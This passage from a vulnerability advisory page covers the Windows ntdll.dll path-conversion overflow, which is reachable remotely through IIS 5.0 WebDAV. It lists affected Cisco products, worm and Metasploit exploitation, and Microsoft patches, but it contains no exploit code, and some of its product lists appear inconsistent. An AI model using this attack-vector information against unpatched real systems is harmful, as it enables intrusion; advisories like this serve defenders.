Cisco Secure Access Control Server 3.2.1
Cisco Routed Wan Management
Cisco QoS Policy Manager
Cisco Personal Assistant
Cisco Networking Services for Active Directory
Cisco Network Registar
Cisco Media Blender
Cisco Lan Management Solution
Cisco IP/VC 3540 Video Rate Matching Module
Cisco IP/VC 3540 Application Server
Cisco IP Telephony Environment Monitor
Cisco IP Contact Center Express
Cisco IP Contact Center Enterprise
Cisco Internet Service Node
Cisco Intelligent Contact Manager 5.0
Cisco Intelligent Contact Manager
Cisco Emergency Responder
Cisco E-Mail Manager
Cisco Dynamic Content Adapter
Cisco DOCSIS CPE Configurator
Cisco Customer Response Application Server
Cisco Conference Connection
Cisco Collaboration Server
Cisco CiscoWorks VPN/Security Management Solution
Cisco Call Manager 3.3 (3)
Cisco Call Manager 3.3
Cisco Call Manager 3.2
Cisco Call Manager 3.1 (3a)
Cisco Call Manager 3.1 (2)
Cisco Call Manager 3.1
Cisco Call Manager 3.0
Cisco Call Manager 2.0
Cisco Call Manager 1.0
Cisco Call Manager
Cisco Building BroadBand Service Manager Hotspot 1.0
Cisco Building Broadband Service Manager (BBSM) 5.2
Cisco Building Broadband Service Manager (BBSM) 5.1
Cisco Broadband Troubleshooter
Cisco Secure Access Control Server 3.2.2
Cisco Secure Access Control Server 3.2 (1.20)

- 不受影响的程序版本

Cisco Secure Access Control Server 3.2.2
Cisco Secure Access Control Server 3.2 (1.20)

- 漏洞讨论

The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.

Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface.

** Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems. Windows XP does not also include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances.

** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks.

** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function.

** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability.

- 漏洞利用

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

A proof-of-concept worm for WebDAV has been released, but is not known to be circulating in the wild at this time.

An exploit has been released as part of the MetaSploit Framework 2.0.

The following exploits are available:

- 解决方案

Some reports indicate that the Microsoft patches for this issue may cause problems. It is not known if this is the result of the patches conflicting with certain configurations. Administrators are advised to apply workaround procedures if problems are experienced after applying the patch.

Microsoft has updated the bulletin with information regarding possible sources of conflicts with this patch. For precise details, see the Caveats section under Additional information about this patch in the Microsoft Security Bulletin.

Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems.

Microsoft has released a new revision of the advisory which contains patches for Windows XP.

Microsoft has released fixes:


Microsoft Windows 2000 Terminal Services SP2

Microsoft Windows 2000 Server SP1

Microsoft Windows 2000 Server

Cisco Conference Connection

Microsoft Windows NT Workstation 4.0 SP6a

Microsoft Windows 2000 Professional SP3

Microsoft Windows 2000 Professional SP2

Microsoft Windows 2000 Terminal Services

Microsoft Windows 2000 Professional

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows XP Home SP1

Cisco IP Contact Center Express

Microsoft Windows 2000 Server SP2

Microsoft Windows 2000 Advanced Server SP1

Microsoft Windows 2000 Advanced Server SP2

Microsoft Windows NT Server 4.0 SP6a

Cisco Internet Service Node

Cisco Call Manager 1.0

Cisco Call Manager 3.0

Cisco Call Manager 3.1 (3a)

Cisco Call Manager 3.1 (2)

Cisco Call Manager 3.1

Cisco Call Manager 3.3 (3)

Cisco Building Broadband Service Manager (BBSM) 5.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站